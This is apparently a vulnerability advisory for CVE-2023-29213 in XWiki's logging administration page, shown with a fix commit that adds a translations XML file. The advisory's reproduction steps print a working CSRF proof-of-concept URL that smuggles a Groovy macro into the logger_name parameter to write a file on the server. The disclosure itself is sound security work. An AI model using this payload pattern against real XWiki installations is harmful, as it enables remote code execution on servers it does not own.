Headline
CVE-2023-29213: XWIKI-20291: Improved translations of logging administration · xwiki/xwiki-platform@49fdfd6
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions of org.xwiki.platform:xwiki-platform-logging-ui it is possible to trick a user with programming rights into visiting a constructed url where e.g., by embedding an image with this URL in a document that is viewed by a user with programming rights which will evaluate an expression in the constructed url and execute it. This issue has been addressed in versions 13.10.11, 14.4.7, and 14.10. Users are advised to upgrade. There are no known workarounds for this vulnerability.
@@ -0,0 +1,79 @@ <?xml version="1.1" encoding="UTF-8"?>
<!-- * See the NOTICE file distributed with this work for additional * information regarding copyright ownership. * * This is free software; you can redistribute it and/or modify it * under the terms of the GNU Lesser General Public License as * published by the Free Software Foundation; either version 2.1 of * the License, or (at your option) any later version. * * This software is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this software; if not, write to the Free * Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA * 02110-1301 USA, or see the FSF site: http://www.fsf.org. -->
<xwikidoc version="1.5" reference="XWiki.Logging.Code.Translations" locale=""> <web>XWiki.Logging.Code</web> <name>Translations</name> <language/> <defaultLanguage>en</defaultLanguage> <translation>0</translation> <creator>xwiki:XWiki.Admin</creator> <parent>WebHome</parent> <author>xwiki:XWiki.Admin</author> <contentAuthor>xwiki:XWiki.Admin</contentAuthor> <version>1.1</version> <title>Translations</title> <comment/> <minorEdit>false</minorEdit> <syntaxId>plain/1.0</syntaxId> <hidden>true</hidden> <content>logging.admin.unsetLevel.success=Logger “{0}” level has been unset. logging.admin.setLevel.success=Logger “{0}” level has been set to "{1}". logging.admin.setLevel.error=Failed to set log level: the logger “{0}” doesn’t exist.</content> <object> <name>XWiki.Logging.Code.Translations</name> <number>0</number> <className>XWiki.TranslationDocumentClass</className> <guid>fc29bfac-011a-4573-80ba-3f5713f1e847</guid> <class> <name>XWiki.TranslationDocumentClass</name> <customClass/> <customMapping/> <defaultViewSheet/> <defaultEditSheet/> <defaultWeb/> <nameField/> <validationScript/> <scope> <cache>0</cache> <disabled>0</disabled> <displayType>select</displayType> <freeText>forbidden</freeText> <largeStorage>0</largeStorage> <multiSelect>0</multiSelect> <name>scope</name> <number>1</number> <prettyName>Scope</prettyName> <relationalStorage>0</relationalStorage> <separator> </separator> <separators>|, </separators> <size>1</size> <unmodifiable>0</unmodifiable> <values>GLOBAL|WIKI|USER|ON_DEMAND</values> <classType>com.xpn.xwiki.objects.classes.StaticListClass</classType> </scope> </class> <property> <scope>WIKI</scope> </property> </object> </xwikidoc>
Related news
### Impact #### Steps to reproduce: It is possible to trick a user with programming rights into visiting <xwiki-host>/xwiki/bin/view/XWiki/LoggingAdmin?loggeraction_set=1&logger_name=%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dnew+File%28%22%2Ftmp%2Fexploit.txt%22%29.withWriter+%7B+out+-%3E+out.println%28%22created+from+notification+filter+preferences%21%22%29%3B+%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D&logger_level=TRACE where <xwiki-host> is the URL of your XWiki installation, e.g., by embedding an image with this URL in a document that is viewed by a user with programming rights. #### Expected result: No file in /tmp/exploit.txt has been created. #### Actual result: The file `/tmp/exploit.txt` is been created with content "created from notification filter preferences!". This demonstrates a CSRF remote code execution vulnerability that could also be used for privilege escalation or data leaks (if the XWiki installation can reach remote hosts). ### Patches The problem has been pat...